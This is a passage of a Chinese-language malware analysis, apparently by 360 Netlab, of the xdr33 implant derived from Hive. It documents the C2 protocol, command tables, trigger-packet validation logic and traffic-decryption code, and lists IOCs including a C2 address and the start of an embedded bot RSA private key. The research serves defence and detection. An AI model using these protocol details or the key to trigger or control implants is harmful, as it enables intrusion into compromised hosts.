<p>xdr33&#x7684;&#x4F5C;&#x8005;&#x4F7F;&#x7528;&#x6E90;&#x7801;&#x4ED3;&#x5E93;&#x4E2D;kaspersky.conf&#xFF0C;&#x4EE5;&#x53CA;thawte.conf 2&#x4E2A;&#x6A21;&#x677F;&#x751F;&#x6210;&#x6240;&#x9700;&#x8981;&#x7684;Bot&#x8BC1;&#x4E66;&#xFF0C;C2&#x8BC1;&#x4E66;&#xFF0C;CA&#x8BC1;&#x4E66;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_certconf.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_certconf.png" class="kg-image"></a></p>
<p>xdr32&#x4E2D;&#x786C;&#x7F16;&#x7801;&#x4E86;DER&#x683C;&#x5F0F;&#x7684;CA&#x8BC1;&#x4E66;&#xFF0C;Bot&#x8BC1;&#x4E66;&#x548C;PrivKey&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_sslsock.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_sslsock.png" class="kg-image"></a></p>
<p>&#x53EF;&#x4EE5;&#x4F7F;&#x7528;<code>openssl x509 -in Cert -inform DER -noout -text</code>&#x67E5;&#x770B;Bot&#x8BC1;&#x4E66;&#xFF0C;&#x5176;&#x4E2D;CN=xdr33&#xFF0C;&#x8FD9;&#x6B63;&#x662F;&#x6B64;&#x5BB6;&#x65CF;&#x540D;&#x5B57;&#x7684;&#x7531;&#x6765;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_botcert.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_botcert.png" class="kg-image"></a></p>
<p>&#x53EF;&#x4EE5;&#x4F7F;&#x7528;<code>openssl s_client -connect 45.9.150.144:443</code> &#x67E5;&#x770B;C2&#x7684;&#x8BC1;&#x4E66;&#x3002;Bot&#xFF0C;C2&#x7684;&#x8BC1;&#x4E66;&#x90FD;&#x4F2A;&#x88C5;&#x6210;&#x4E0E;kaspersky&#x6709;&#x5173;&#xFF0C;&#x901A;&#x8FC7;&#x8FD9;&#x79CD;&#x65B9;&#x5F0F;&#x964D;&#x4F4E;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#x7684;&#x53EF;&#x7591;&#x6027;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_c2cert.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_c2cert.png" class="kg-image"></a></p>
<p>CA&#x8BC1;&#x4E66;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x4ECE;3&#x4E2A;&#x8BC1;&#x4E66;&#x7684;&#x6709;&#x6548;&#x671F;&#x6765;&#x770B;&#xFF0C;&#x6211;&#x4EEC;&#x63A8;&#x6D4B;&#x6B64;&#x6B21;&#x6D3B;&#x52A8;&#x7684;&#x5F00;&#x59CB;&#x65F6;&#x95F4;&#x5728;2022.10.7&#x4E4B;&#x540E;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_ca.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_ca.png" class="kg-image"></a></p>
<h3 id="step2xtea">Step2: &#x83B7;&#x53D6;XTEA&#x5BC6;&#x94A5;</h3>
<p>Bot&#x548C;C2&#x5EFA;&#x7ACB;SSL&#x901A;&#x4FE1;&#x4E4B;&#x540E;&#xFF0C;Bot&#x901A;&#x8FC7;&#x4EE5;&#x4E0B;&#x4EE3;&#x7801;&#x7247;&#x6BB5;&#x5411;C2&#x8BF7;&#x6C42;XTEA&#x5BC6;&#x94A5;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2023/01/hive_teakey.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_teakey.png" class="kg-image"></a></p>
<p>&#x5B83;&#x7684;&#x5904;&#x7406;&#x903B;&#x8F91;&#x4E3A;&#xFF1A;</p>
<ol>
<li>
<p>Bot&#x5411;C2&#x53D1;&#x9001;64&#x5B57;&#x8282;&#x6570;&#x636E;&#xFF0C;&#x683C;&#x5F0F;&#x4E3A;&quot;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x957F;&#x5EA6;&#x5B57;&#x4E32;&#x7684;&#x957F;&#x5EA6;&#xFF08;xor 5&#xFF09; + &#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x957F;&#x5EA6;&#x5B57;&#x4E32;&#xFF08;xor 5&#xFF09; + &#x968F;&#x673A;&#x6570;&#x636E;&quot;</p>
</li>
<li>
<p>Bot&#x4ECE;C2&#x63A5;&#x6536;32&#x5B57;&#x8282;&#x6570;&#x636E;&#xFF0C;&#x4ECE;&#x4E2D;&#x5F97;&#x5230;16&#x5B57;&#x8282;&#x7684;XTEA KEY&#xFF0C;&#x83B7;&#x53D6;KEY&#x7684;&#x7B49;&#x6548;&#x7684;python&#x4EE3;&#x7801;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code>XOR_KEY=5
def get_key(rand_bytes):
	offset = (ord(rand_bytes[0]) ^ XOR_KEY) % 15
	return  rand_bytes[(offset+1):(offset+17)]
</code></pre>
</li>
</ol>
<h3 id="step3c2xtea">Step3: &#x5411;C2&#x4E0A;&#x62A5;XTEA&#x52A0;&#x5BC6;&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;</h3>
<p>Bot&#x4F7F;&#x7528;Step2&#x83B7;&#x5F97;&#x7684;XTEA KEY &#x5BF9;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x52A0;&#x5BC6;&#xFF0C;&#x5E76;&#x4E0A;&#x62A5;&#x7ED9;C2&#x3002;&#x7531;&#x4E8E;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x8F83;&#x591A;&#xFF0C;&#x4E00;&#x822C;&#x9700;&#x8981;&#x5206;&#x5757;&#x53D1;&#x9001;&#xFF0C;Bot&#x4E00;&#x6B21;&#x6700;&#x591A;&#x53D1;&#x9001;4052&#x5B57;&#x8282;&#xFF0C;&#x800C;C2&#x5219;&#x4F1A;&#x56DE;&#x590D;&#x5DF2;&#x63A5;&#x53D7;&#x7684;&#x5B57;&#x8282;&#x6570;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2023/01/hive_teadevice.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_teadevice.png" class="kg-image"></a></p>
<p>&#x53E6;&#x5916;&#x503C;&#x5F97;&#x4E00;&#x63D0;&#x7684;&#x662F;&#xFF0C;XTEA&#x52A0;&#x5BC6;&#x53EA;&#x5728;Step3&#x4E2D;&#x4F7F;&#x7528;&#xFF0C;&#x540E;&#x7EED;&#x7684;Step4&#x4E2D;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#x4EC5;&#x4EC5;&#x4F7F;&#x7528;SSL&#x534F;&#x5546;&#x597D;&#x7684;&#x52A0;&#x5BC6;&#x52A0;&#x5BC6;&#x5957;&#x4EF6;&#xFF0C;&#x4E0D;&#x518D;&#x4F7F;&#x7528;XTEA&#x3002;</p>
<h3 id="step4xdr33">Step4: &#x7B49;&#x5F85;&#x6267;&#x884C;&#x6307;&#x4EE4;&#xFF08;xdr33&#x65B0;&#x589E;&#x529F;&#x80FD;&#xFF09;</h3>
<p>&#x5F53;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x4E0A;&#x62A5;&#x5B8C;&#x6BD5;&#x540E;&#xFF0C;C2&#x5411;Bot&#x53D1;&#x9001;8&#x5B57;&#x8282;&#x7684;&#x672C;&#x5468;&#x671F;&#x4EFB;&#x52A1;&#x6B21;&#x6570;N&#xFF0C;&#x82E5;N&#x7B49;&#x4E8E;0&#x5C31;&#x4F11;&#x7720;&#x4E00;&#x5B9A;&#x65F6;&#x95F4;&#xFF0C;&#x8FDB;&#x5165;&#x4E0B;&#x4E00;&#x4E2A;&#x5468;&#x671F;&#x7684;Beacon Task&#xFF1B;&#x53CD;&#x4E4B;&#x5C31;&#x4E0B;&#x53D1;264&#x5B57;&#x8282;&#x7684;&#x4EFB;&#x52A1;&#x3002;Bot&#x63A5;&#x6536;&#x5230;&#x4EFB;&#x52A1;&#x540E;&#xFF0C;&#x5BF9;&#x5176;&#x8FDB;&#x884C;&#x89E3;&#x6790;&#xFF0C;&#x5E76;&#x6267;&#x884C;&#x76F8;&#x5E94;&#x7684;&#x6307;&#x4EE4;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2023/01/hive_beaconwaitcmd.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_beaconwaitcmd.png" class="kg-image"></a></p>
<p>&#x652F;&#x6301;&#x7684;&#x6307;&#x4EE4;&#x5982;&#x4E0B;&#x8868;&#x6240;&#x793A;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>Index</th>
<th>Function</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x01</td>
<td>Download File</td>
</tr>
<tr>
<td>0x02</td>
<td>Execute CMD with fake name &quot;[kworker/3:1-events]&quot;</td>
</tr>
<tr>
<td>0x03</td>
<td>Update</td>
</tr>
<tr>
<td>0x04</td>
<td>Upload File</td>
</tr>
<tr>
<td>0x05</td>
<td>Delete</td>
</tr>
<tr>
<td>0x08</td>
<td>Launch Shell</td>
</tr>
<tr>
<td>0x09</td>
<td>Socket5 Proxy</td>
</tr>
<tr>
<td>0x0b</td>
<td>Update BEACONINFO</td>
</tr>
</tbody>
</table>
<h2 id>&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#x793A;&#x4F8B;</h2>
<h3 id="xdr33step2">&#x5B9E;&#x9645;&#x4E2D;xdr33&#x4EA7;&#x751F;&#x7684;step2&#x6D41;&#x91CF;</h3>
<p><a href="https://blog.netlab.360.com/content/images/2023/01/hive_packet.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_packet.png" class="kg-image"></a></p>
<h3 id="step3step4">step3&#x4E2D;&#x7684;&#x4EA4;&#x4E92;&#xFF0C;&#x4EE5;&#x53CA;step4&#x7684;&#x6D41;&#x91CF;</h3>
<p><a href="https://blog.netlab.360.com/content/images/2023/01/hive_packetB.png"><img src="https://blog.netlab.360.com/content/images/2023/01/hive_packetB.png" class="kg-image"></a></p>
<h3 id>&#x6211;&#x4EEC;&#x4ECE;&#x4E2D;&#x80FD;&#x5F97;&#x5230;&#x4EC0;&#x4E48;&#x4FE1;&#x606F;&#x5462;&#xFF1F;</h3>
<ol>
<li>
<p>&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x957F;&#x5EA6;&#x5B57;&#x4E32;&#x7684;&#x957F;&#x5EA6;&#xFF0C;0x1 ^ 0x5 = 0x4</p>
</li>
<li>
<p>&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x957F;&#x5EA6;&#xFF0C;0x31,0x32,0x37,0x35 &#x5206;&#x522B; xor 5&#x5F97;&#x5230; 4720</p>
</li>
<li>
<p>tea key <code>2E 09 9B 08 CF 53 BE E7  A0 BE 11 42 31 F4 45 3A</code></p>
</li>
<li>
<p>C2&#x4F1A;&#x786E;&#x8BA4;BOT&#x4E0A;&#x62A5;&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#x957F;&#x5EA6;&#xFF0C;4052+668 = 4720,&#x548C;&#x7B2C;2&#x70B9;&#x662F;&#x80FD;&#x5BF9;&#x5E94;&#x4E0A;&#x7684;</p>
</li>
<li>
<p>&#x672C;&#x5468;&#x671F;&#x4EFB;&#x52A1;&#x6570;<code>00 00 00 00 00 00 00 00</code>&#xFF0C;&#x5373;&#x65E0;&#x4EFB;&#x52A1;&#xFF0C;&#x6240;&#x4EE5;&#x4E0D;&#x4F1A;&#x4E0B;&#x53D1;264&#x5B57;&#x8282;&#x7684;&#x5177;&#x4F53;&#x4EFB;&#x52A1;</p>
</li>
</ol>
<p>&#x5173;&#x4E8E;&#x52A0;&#x5BC6;&#x7684;&#x8BBE;&#x5907;&#x4FE1;&#x606F;&#xFF0C;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x4EE5;&#x4E0B;&#x4EE3;&#x7801;&#x8FDB;&#x884C;&#x89E3;&#x5BC6;&#xFF0C;&#x4EE5;&#x89E3;&#x5BC6;&#x524D;8&#x5B57;&#x8282;<code>65 d8 b1 f9 b8 37 37 eb</code>&#x4E3A;&#x4F8B;&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x6570;&#x636E;&#x4E3A;<code>00 22 00 14 42 5A 68 39</code>&#xFF0C;&#x5305;&#x542B;&#x4E86;<code>beacon_header_version + os+ bzip magic</code>&#xFF0C;&#x548C;&#x524D;&#x9762;&#x7684;&#x5206;&#x6790;&#x80FD;&#x591F;&#x4E00;&#x4E00;&#x5BF9;&#x5E94;&#x3002;</p>
<pre><code>import hexdump
import struct

def xtea_decrypt(key,block,n=32,endian=&quot;!&quot;):
    v0,v1 = struct.unpack(endian+&quot;2L&quot;, block)
    k = struct.unpack(endian+&quot;4L&quot;,key)
    delta,mask = 0x9e3779b9,0xffffffff
    sum = (delta * n) &amp; mask
    for round in range(n):
        v1 = (v1 - (((v0&lt;&lt;4 ^ v0&gt;&gt;5) + v0) ^ (sum + k[sum&gt;&gt;11 &amp; 3]))) &amp; mask
        sum = (sum - delta) &amp; mask
        v0 = (v0 - (((v1&lt;&lt;4 ^ v1&gt;&gt;5) + v1) ^ (sum + k[sum &amp; 3]))) &amp; mask
    return struct.pack(endian+&quot;2L&quot;,v0,v1)

def decrypt_data(key,data):
    size = len(data)
    i = 0
    ptext = b&apos;&apos;
    while i &lt; size:
        if size - i &gt;= 8:
            ptext += xtea_decrypt(key,data[i:i+8])
        i += 8
    return ptext
key=bytes.fromhex(&quot;&quot;&quot;
2E 09 9B 08 CF 53 BE E7  A0 BE 11 42 31 F4 45 3A
&quot;&quot;&quot;)
enc_buf=bytes.fromhex(&quot;&quot;&quot;
65 d8 b1 f9 b8 37 37 eb
&quot;&quot;&quot;)

hexdump.hexdump(decrypt_data(key,enc_buf))
</code></pre>
<h1 id="triggertask">Trigger Task</h1>
<p>Trigger&#x4E3B;&#x8981;&#x529F;&#x80FD;&#x662F;&#x76D1;&#x542C;&#x6240;&#x6709;&#x6D41;&#x91CF;&#xFF0C;&#x7B49;&#x5F85;&#x7279;&#x5B9A;&#x683C;&#x5F0F;&#x7684;Triggger IP&#x62A5;&#x6587;&#xFF0C;&#x5F53;&#x62A5;&#x6587;&#x4EE5;&#x53CA;&#x9690;&#x85CF;&#x5728;&#x62A5;&#x6587;&#x4E2D;&#x7684;Trigger Payload&#x901A;&#x8FC7;&#x5C42;&#x5C42;&#x6821;&#x9A8C;&#x4E4B;&#x540E;&#xFF0C;Bot&#x5C31;&#x548C;Trigger Payload&#x4E2D;&#x7684;C2&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#xFF0C;&#x7B49;&#x5F85;&#x6267;&#x884C;&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#x3002;</p>
<h2 id="0x1">0x1: &#x76D1;&#x542C;&#x6D41;&#x91CF;</h2>
<p>&#x4F7F;&#x7528;&#x51FD;&#x6570;&#x8C03;&#x7528;<strong>socket( PF_PACKET, SOCK_RAW, htons( ETH_P_IP ) )</strong>&#xFF0C;&#x8BBE;&#x5B9A;RAW SOCKET&#x6355;&#x83B7;IP&#x62A5;&#x6587;&#xFF0C;&#x518D;&#x901A;&#x8FC7;&#x4EE5;&#x4E0B;&#x4EE3;&#x7801;&#x7247;&#x6BB5;&#x5BF9;IP&#x62A5;&#x6587;&#x5904;&#x7406;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;Tirgger&#x652F;&#x6301;TCP,UDP&#xFF0C;&#x62A5;&#x6587;Payload&#x6700;&#x5927;&#x957F;&#x5EA6;&#x4E3A;472&#x5B57;&#x8282;&#x3002;&#x8FD9;&#x79CD;&#x6D41;&#x91CF;&#x55C5;&#x63A2;&#x7684;&#x5B9E;&#x73B0;&#x65B9;&#x5F0F;&#x4F1A;&#x52A0;&#x5927;CPU&#x7684;&#x8D1F;&#x8F7D;&#xFF0C;&#x4E8B;&#x5B9E;&#x4E0A;&#x5728;socket&#x4E0A;&#x4F7F;&#x7528;BPF-Filter&#x6548;&#x679C;&#x4F1A;&#x66F4;&#x597D;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_snfpkt.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_snfpkt.png" class="kg-image"></a></p>
<h2 id="0x2trigger">0x2: &#x6821;&#x9A8C;Trigger&#x62A5;&#x6587;</h2>
<p>&#x7B26;&#x5408;&#x957F;&#x5EA6;&#x8981;&#x6C42;&#x7684;TCP,UDP&#x62A5;&#x6587;&#x4F7F;&#x7528;&#x76F8;&#x540C;&#x7684;&#x5904;&#x7406;&#x51FD;&#x6570;check_payload&#x8FDB;&#x884C;&#x8FDB;&#x4E00;&#x6B65;&#x6821;&#x9A8C;&#xFF0C;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_handxref.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_handxref.png" class="kg-image"></a></p>
<p><strong>check_payload</strong>&#x7684;&#x4EE3;&#x7801;&#x5982;&#x4E0B;&#x6240;&#x793A;:<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_checkpayload.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_checkpayload.png" class="kg-image"></a></p>
<p>&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x5B83;&#x7684;&#x5904;&#x7406;&#x903B;&#x8F91;&#xFF1A;</p>
<ol>
<li>
<p>&#x4F7F;&#x7528;CRC16/CCITT-FALSE&#x7B97;&#x6CD5;&#x8BA1;&#x7B97;&#x62A5;&#x6587;&#x4E2D;&#x504F;&#x79FB;8&#x5230;92&#x7684;CRC16&#x503C;&#xFF0C;&#x5F97;&#x5230;crcValue</p>
</li>
<li>
<p>&#x901A;&#x8FC7;crcValue % 200+ 92&#x5F97;&#x5230;crcValue&#x5728;&#x5728;&#x62A5;&#x6587;&#x4E2D;&#x7684;&#x504F;&#x79FB;&#x503C;&#xFF0C;crcOffset</p>
</li>
<li>
<p>&#x6821;&#x9A8C;&#x62A5;&#x6587;&#x4E2D;crcOffset&#x5904;&#x7684;&#x6570;&#x636E;&#x662F;&#x5426;&#x7B49;&#x4E8E;crcValue&#xFF0C;&#x82E5;&#x76F8;&#x7B49;&#x8FDB;&#x5165;&#x4E0B;&#x4E00;&#x6B65;</p>
</li>
<li>
<p>&#x6821;&#x9A8C;&#x62A5;&#x6587;&#x4E2D;crcOffset+2&#x5904;&#x7684;&#x6570;&#x636E;&#x662F;&#x5426;&#x662F;127&#x7684;&#x6574;&#x6570;&#x500D;&#xFF0C;&#x82E5;&#x662F;&#xFF0C;&#x8FDB;&#x5165;&#x4E0B;&#x4E00;&#x6B65;</p>
</li>
<li>
<p>Trigger_Payload&#x662F;&#x52A0;&#x5BC6;&#x7684;&#xFF0C;&#x8D77;&#x59CB;&#x4F4D;&#x7F6E;&#x4E3A;crcOffset+12&#xFF0C;&#x957F;&#x5EA6;&#x4E3A;29&#x5B57;&#x8282;&#x3002;Xor_Key&#x7684;&#x8D77;&#x59CB;&#x4F4D;&#x7F6E;&#x662F;crcValue%55+8&#xFF0C;&#x5C06;2&#x8005;&#x9010;&#x5B57;&#x8282;XOR&#xFF0C;&#x5C31;&#x5F97;&#x5230;&#x4E86;Trigger_Paylaod</p>
</li>
</ol>
<p>&#x81F3;&#x6B64;&#x53EF;&#x4EE5;&#x786E;&#x5B9A;<strong>Trigger&#x62A5;&#x6587;&#x683C;&#x5F0F;</strong>&#x662F;&#x8FD9;&#x6837;&#x7684;&#xFF1A;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_triggerpkt-1.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_triggerpkt-1.png" class="kg-image"></a></p>
<h2 id="0x3triggerpayload">0x3:  &#x6821;&#x9A8C; Trigger Payload</h2>
<p>&#x5982;&#x679C;Trigger&#x62A5;&#x6587;&#x901A;&#x8FC7;&#x6821;&#x9A8C;&#xFF0C;&#x5219;&#x901A;&#x8FC7;check_trigger&#x51FD;&#x6570;&#x7EE7;&#x7EED;&#x5BF9;Trigger Payload&#x8FDB;&#x884C;&#x6821;&#x9A8C;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_triggerfinal.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_triggerfinal.png" class="kg-image"></a></p>
<p>&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x5B83;&#x7684;&#x5904;&#x7406;&#x903B;&#x8F91;&#xFF1A;</p>
<ol>
<li>&#x53D6;&#x51FA;Trigger Payload&#x6700;&#x540E;2&#x5B57;&#x8282;&#xFF0C;&#x8BB0;&#x4F5C;crcRaw</li>
<li>&#x5C06;Trigger Payload&#x6700;&#x540E;2&#x5B57;&#x8282;&#x7F6E;0&#xFF0C;&#x8BA1;&#x7B97;&#x5176;CRC16&#xFF0C;&#x8BB0;&#x4F5C;crcCalc</li>
<li>&#x6BD4;&#x8F83;crcRaw&#xFF0C;crcCalc&#xFF0C;&#x82E5;&#x76F8;&#x7B49;&#xFF0C;&#x8BF4;&#x660E;Trigger Payload&#x5728;&#x7ED3;&#x6784;&#x4E0A;&#x662F;&#x6709;&#x6548;&#x7684;</li>
</ol>
<p>&#x63A5;&#x7740;&#x8BA1;&#x7B97;&#x8FC7;Trigger Payload&#x4E2D;&#x7684;key&#x7684;SHA1&#xFF0C;&#x548C;Bot&#x4E2D;&#x786C;&#x7F16;&#x7801;&#x7684;SHA1 <strong>46a3c308401e03d3195c753caa14ef34a3806593</strong>&#x8FDB;&#x884C;&#x6BD4;&#x5BF9;&#x3002;&#x5982;&#x679C;&#x76F8;&#x7B49;&#xFF0C;&#x8BF4;&#x660E;Trigger Payload&#x5728;&#x5185;&#x5BB9;&#x662F;&#x4E5F;&#x662F;&#x6709;&#x6548;&#x7684;&#xFF0C;&#x53EF;&#x4EE5;&#x8FDB;&#x5165;&#x5230;&#x6700;&#x540E;&#x4E00;&#x6B65;&#xFF0C;&#x548C;Trigger Payload&#x4E2D;&#x7684;C2&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#xFF0C;&#x7B49;&#x5F85;&#x6267;&#x884C;&#x5176;&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#x3002;</p>
<p>&#x81F3;&#x6B64;&#x53EF;&#x4EE5;&#x786E;&#x5B9A;<strong>Trigger Payload</strong>&#x7684;&#x683C;&#x5F0F;&#x662F;&#x8FD9;&#x6837;&#x7684;&#xFF1A;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_triggerfmt-1.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_triggerfmt-1.png" class="kg-image"></a></p>
<h2 id="0x4triggerc2">0x4: &#x6267;&#x884C;Trigger C2&#x7684;&#x6307;&#x4EE4;</h2>
<p>&#x5F53;&#x4E00;&#x4E2A;Trigger&#x62A5;&#x6587;&#x901A;&#x8FC7;&#x5C42;&#x5C42;&#x6821;&#x9A8C;&#x4E4B;&#x540E;&#xFF0C;Bot&#x5C31;&#x4E3B;&#x52A8;&#x548C;Trigger Payload&#x4E2D;&#x6307;&#x5B9A;&#x7684;C2&#x8FDB;&#x884C;&#x901A;&#x4FE1;&#xFF0C;&#x7B49;&#x5F85;&#x6267;&#x884C;C2&#x4E0B;&#x53D1;&#x6307;&#x4EE4;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_triggercmd.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_triggercmd.png" class="kg-image"></a></p>
<p>&#x652F;&#x6301;&#x7684;&#x6307;&#x4EE4;&#x5982;&#x4E0B;&#x8868;&#x6240;&#x793A;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>Index</th>
<th>Function</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00,0x00a</td>
<td>Exit</td>
</tr>
<tr>
<td>0x01</td>
<td>Download File</td>
</tr>
<tr>
<td>0x02</td>
<td>Execute CMD</td>
</tr>
<tr>
<td>0x04</td>
<td>Upload File</td>
</tr>
<tr>
<td>0x05</td>
<td>Delete</td>
</tr>
<tr>
<td>0x06</td>
<td>Shutdown</td>
</tr>
<tr>
<td>0x08</td>
<td>Launch SHELL</td>
</tr>
<tr>
<td>0x09</td>
<td>SOCKET5 PROXY</td>
</tr>
<tr>
<td>0x0b</td>
<td>Update BEACONINFO</td>
</tr>
</tbody>
</table>
<p>&#x503C;&#x5F97;&#x4E00;&#x63D0;&#x7684;&#x662F;&#xFF0C;Trigger C2&#x4E0E;Beacon C2&#x5728;&#x901A;&#x4FE1;&#x7684;&#x7EC6;&#x8282;&#x4E0A;&#x6709;&#x6240;&#x4E0D;&#x540C;&#x3002;Bot&#x4E0E;Trigger C2&#x5728;&#x5EFA;&#x7ACB;SSL&#x96A7;&#x9053;&#x4E4B;&#x540E;&#xFF0C;&#x4F1A;&#x4F7F;&#x7528;Diffie-Helllman&#x5BC6;&#x94A5;&#x4EA4;&#x6362;&#x4EE5;&#x5EFA;&#x7ACB;&#x5171;&#x4EAB;&#x5BC6;&#x94A5;&#xFF0C;&#x8FD9;&#x628A;&#x94A5;&#x5319;&#x7528;&#x4E8E;AES&#x7B97;&#x6CD5;&#x521B;&#x5EFA;&#x7B2C;&#x4E8C;&#x5C42;&#x52A0;&#x5BC6;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/12/hive_aes.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_aes.png" class="kg-image"></a></p>
<h1 id>&#x5B9E;&#x9A8C;</h1>
<p>&#x4E3A;&#x4E86;&#x9A8C;&#x8BC1;Trigger&#x90E8;&#x5206;&#x9006;&#x5411;&#x5206;&#x6790;&#x7684;&#x6B63;&#x786E;&#x6027;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9;xdr33&#x7684;SHA1&#x503C;&#x8FDB;&#x884C;&#x4E86;Patch&#xFF0C;&#x586B;&#x5165;&#x4E86;<strong>NetlabPatched,Enjoy!</strong> &#x7684;SHA1&#xFF0C;&#x5E76;&#x5B9E;&#x73B0;&#x4E86;&#x9644;&#x5F55;&#x7684;GenTrigger&#x4EE3;&#x7801;&#xFF0C;&#x7528;&#x4EE5;&#x4EA7;&#x751F;UDP&#x7C7B;&#x578B;Trigger &#x62A5;&#x6587;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_patchbylab.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_patchbylab.png" class="kg-image"></a></p>
<p>&#x6211;&#x4EEC;&#x5728;&#x865A;&#x62DF;&#x673A;<strong>192.168.159.133</strong>&#x8FD0;&#x884C;Patch&#x540E;&#x7684;xdr33&#x6837;&#x672C;&#xFF0C;&#x6784;&#x9020;C2&#x4E3A;<strong>192.168.159.128:6666</strong>&#x7684;Trigger Payload&#xFF0C;&#x5E76;&#x4EE5;UDP&#x7684;&#x65B9;&#x5F0F;&#x53D1;&#x9001;&#x7ED9;192.168.159.133&#x3002;&#x6700;&#x7EC8;&#x6548;&#x679C;&#x5982;&#x4E0B;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x5230;xdr33&#x6240;&#x5728;&#x7684;implanted host&#x5728;&#x6536;&#x5230;UDP Trigger&#x62A5;&#x6587;&#x540E;&#xFF0C;&#x548C;&#x6211;&#x4EEC;&#x9884;&#x60F3;&#x4E2D;&#x7684;&#x4E00;&#x6837;&#xFF0C;&#x5411;&#x9884;&#x8BBE;&#x7684;Trigger C2&#x53D1;&#x8D77;&#x4E86;&#x901A;&#x4FE1;&#x8BF7;&#x6C42;&#xFF0C;Cool&#xFF01;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_vmware.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_vmware.png" class="kg-image"></a></p>
<h1 id>&#x8054;&#x7CFB;&#x6211;&#x4EEC;</h1>
<p>&#x81F3;&#x6B64;xdr33&#x7684;&#x5206;&#x6790;&#x544A;&#x4E00;&#x6BB5;&#x843D;&#xFF0C;&#x8FD9;&#x662F;&#x6211;&#x4EEC;&#x76EE;&#x524D;&#x638C;&#x63E1;&#x7684;&#x5173;&#x4E8E;&#x8FD9;&#x4E2A;&#x9B54;&#x6539;&#x653B;&#x51FB;&#x5957;&#x4EF6;&#x7684;&#x60C5;&#x51B5;&#x3002;&#x5982;&#x679C;&#x793E;&#x533A;&#x6709;&#x66F4;&#x591A;&#x7EBF;&#x7D22;&#xFF0C;&#x4EE5;&#x53CA;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x5728; <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com">twitter</a> &#x6216;&#x8005;&#x901A;&#x8FC7;&#x90AE;&#x4EF6;netlab[at]360.cn&#x8054;&#x7CFB;&#x6211;&#x4EEC;&#x3002;</p>
<h1 id="ioc">IOC</h1>
<h2 id="sample">sample</h2>
<pre><code>ee07a74d12c0bb3594965b51d0e45b6f

patched sample

af5d2dfcafbb23666129600f982ecb87
</code></pre>
<h2 id="c2">C2</h2>
<pre><code>45.9.150.144:443
</code></pre>
<h2 id="botprivatekey">BOT Private Key</h2>
<pre><code>-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA6XthqPjU3XFu8/4PMVQ4iqJbleXmXhbVWMPhY/sTndEcO5vQ
mIMNJc1mISZTNPzddXSrj0h9GJe0ix0CIZID3bHyZHLiqb/ewylFmqSOVkviG/Je
